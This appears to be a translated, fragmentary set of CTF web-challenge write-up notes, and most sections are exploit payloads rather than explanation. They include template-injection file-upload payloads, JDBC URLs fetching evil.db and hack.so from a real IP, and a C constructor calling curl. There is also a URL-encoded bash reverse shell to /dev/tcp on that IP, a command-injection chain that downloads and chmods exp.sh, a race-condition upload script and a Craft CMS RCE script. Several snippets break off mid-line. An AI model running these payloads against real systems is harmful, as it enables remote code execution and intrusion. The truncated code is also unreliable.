EzHttp
One point: $_SERVER[HTTP_X] means the request header X is being passed through.
flag保卫战 (Flag Defense)
noumisotuitennnoka
For the key point, start reading from my:
$dir -> /tmp
$subdir -> /$jsons
$jsonDir -> /tmp/$jsons
$escapeDir -> /var/www/html/$jsons
$archiveFile -> /tmp/$jsons/archive.zip
/tmp/$jsons/backdoor.php
/tmp/$jsons/.htaccess
$dev_dir -> default /tmp, optional
Ugh, too many variables, let's just search directly. This looks like the exploitation point, but why is it still forbidden? Is the environment still up? Sigh.

<?php
$file = 'foo-bar';
touch($file);
$zip = new ZipArchive();
$zip->open('test.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
$options = array('add_path' => 'prefix-', 'remo ...
gosession
First, modify the file and start the service to get the admin session (incognito browser, I love you). After that it is a pongo2 template injection.

First, X1r0z's:
// UserAgent returns the client's User-Agent, if sent in the request.
func (r *Request) UserAgent() string {
	return r.Header.Get("User-Agent")
}
/admin?name={{c.SaveUploadedFile(c.FormFile(c.Request.UserAgent()),c.Request.UserAgent())}}

And another one from master 大头:
/admin?name={%set form=c.Query(c.HandlerName|first)%}{%set path=c.Query(c.HandlerName|last)%}{%set file=c.FormFile(form ...
reading
import os
import math
import time
import hashlib
from flask import Flask, request, session, render_template, send_file
from datetime import datetime

app = Flask(__name__)
app.secret_key = hashlib.md5(os.urandom(32)).hexdigest()
key = hashlib.md5(str(time.time_ns()).encode()).hexdigest()
books = os.listdir('./books')
books.sort(reverse=True)

@app.route('/')
def index():
    if session:
        book = session['book']
        page = session['page']
        page_size = sessio ...
cms
The system API has a qrcode endpoint; passing it a parameter gives an SSRF that reaches flag.php.
java
{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/evil.db","tableName":"trigger_action_table"}
{"type":"3","url":"jdbc:sqlite::resource:http://165.154.5.221:8888/hack.so"}
Come on bro, releasing the challenge after the contest, really?
#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
__attribute__ ((__constructor__)) void preload (void){ system("curl 165. ...
cms_rev
If it is an image, two requests are made; if it is not an image, the HTTP status codes of the first and second visits also differ, which gives it away as well.
from flask import Flask, redirect, send_from_directory

app = Flask(__name__)
flag = 0

@app.route('/')
def example_redirect():
    global flag
    if flag != 0:
        return redirect('http://127.0.0.1/flag.php?cmd=%62%61%73%68%20%2d%63%20%27%65%78%65%63%20%62%61%73%68%20%2d%69%20%26%3e%2f%64%65%76%2f%74%63%70%2f%31%36%35%2e%31%35%34%2e%35%2e%32%32%31%2f%39%39%39%39%20%3c%26%31%27', code=302)
    else:
        flag += 1
        re ...
php
\ php -r eval\(hex2bin\(substr\('_6c73',1\)\)\)\;
Remove the \ characters.
Pulled from someone else's blog; a race condition:
import requests
import threading
import re

url = "url"
proxies = {"http": None}

def upoadFile():
    file = {"files": open("e.php")}
    data = {"cmd": "du -a /"}
    res = requests.post(url, files=file, data=data)
    r = re.findall("(/tmp/php.*)", res.text)
    # print(r)
    if r and r[0] != '' and r[0] != '/tm ...
sanic
Python prototype-chain pollution. First set the cookie; the semicolon is bypassed with the octal escape \073, e.g. adm\073n.
Craft CMS
import requests
import re
import sys

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36"
}

def writePayloadToFile(tmpDir):
    data = {
        "action": "conditions/render",
        "configObject": "craft\elements\conditions\ElementCondition",
        "config": '{"name":"configObject","as &qu ...
GO2nd
Sigh, I really lacked confidence on this one. CVE-2021-42740 analysis article.
`:`something``:# becomes: `:\`something\``:\#
http://localhost:3333/checker?url=127.0.0.1:`:`wget$IFS\http://165.154.5.221/exp.sh$IFS\-O$IFS/tmp/s.sh``:`
then chmod +x /tmp/s.sh
http://localhost:3333/checker?url=127.0.0.1:`:`chmod$IFS\777$IFS\/tmp/s.sh``:`
Treat `:`something``:# as `, and treat $IFS\ as a space.
dionysus